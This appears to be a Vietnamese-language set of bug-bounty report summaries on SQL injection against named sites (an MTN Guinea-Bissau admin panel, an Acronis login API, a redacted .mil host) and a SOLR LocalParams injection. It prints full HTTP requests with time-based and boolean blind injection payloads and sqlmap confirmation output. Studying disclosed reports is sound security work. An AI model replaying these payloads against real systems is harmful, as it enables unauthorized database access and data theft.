SQL Injection on the Administrator Panel SQLi
Tồn tại lỗ hổng SQL Injection ở endpoint https://mtngbissau.com/webadmin/index.php:
POST /webadmin/index.php HTTP/1.1
Host: mtngbissau.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://mtngbissau.com/webadmin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: close
Cookie: PHPSESSID=74db1535be320f591b6106253ad77191; SERVERID68971=262072|Xq8Kv|Xq8Ip
Upgrade-Insecure-Requests: 1
login=user'&pass=uesseAttacker sử dụng sqlmap để confirm:
[*] starting @ 21:06:44 /2020-05-03/
[18:05:44] [INFO] parsing HTTP request from 'post'
[18:06:10] [INFO] resuming back-end DBMS 'mysql'
[18:06:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: login (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: login=admin' AND (SELECT 5206 FROM (SELECT(SLEEP(5)))THtF) AND 'MHhg'='MHhg&pass=admin
---
[18:06:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[18:06:45] [INFO] fetched data logged to text files under '/home/kira/.sqlmap/output/mtngbissau.com'SQL Injection in https://demor.adr.acronis.com/ via the username Parameter SQLi
SQL injection trong param username:
POST /ng/api/auth/login HTTP/2
Host: demor.adr.acronis.com
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://demor.adr.acronis.com/
Cookie: PHPSESSID=bsrq24l7g5fmth5b683v2b3gu4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
{"username":"0'XOR(if(now()=sysdate(),sleep(35),0))XOR'Z","id":"27","password":"cc4226104294e44c5cec9f31cb6de7fa4597e4321b277f4e4b78c3a0ff980956"}Boolean Based Blind Sql Injection Via User Agent in ███.mil SQLi
Attacker có thể tấn công Boolean Based SQL Injection thông qua User-Agent header. Payload
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10' AND 8074=8074-- KwOGAbusing LocalParams (city) to Inject SOLR Query solr-injection
Attacker có thể tấn công SOLR injection (SOLR là một search engine của Apache) thông qua param city ở endpoint /webapi/searchapi.php. Attacker phát hiện bằng cách thêm dấu backslash vào cuối giá trị của param và thấy rằng nó trả về 500 response. Trong khi đó, khi sử dụng 2 dấu backslash thì response trả về là 200.
Tip
Dù không khai thác được, một phần do nó là blind injection, attacker vẫn được trả bounty.
Info
Tồn tại report Eternal | Report #953203 - [api.zomato.com] Abusing LocalParams (city_id) to Inject SOLR query | HackerOne với lỗ hổng tương tự:
:v2/red/homepage.json?lat=&lon=&city_id={!dismax+df=city_id}86&android_country=US&lang=en&android_language=en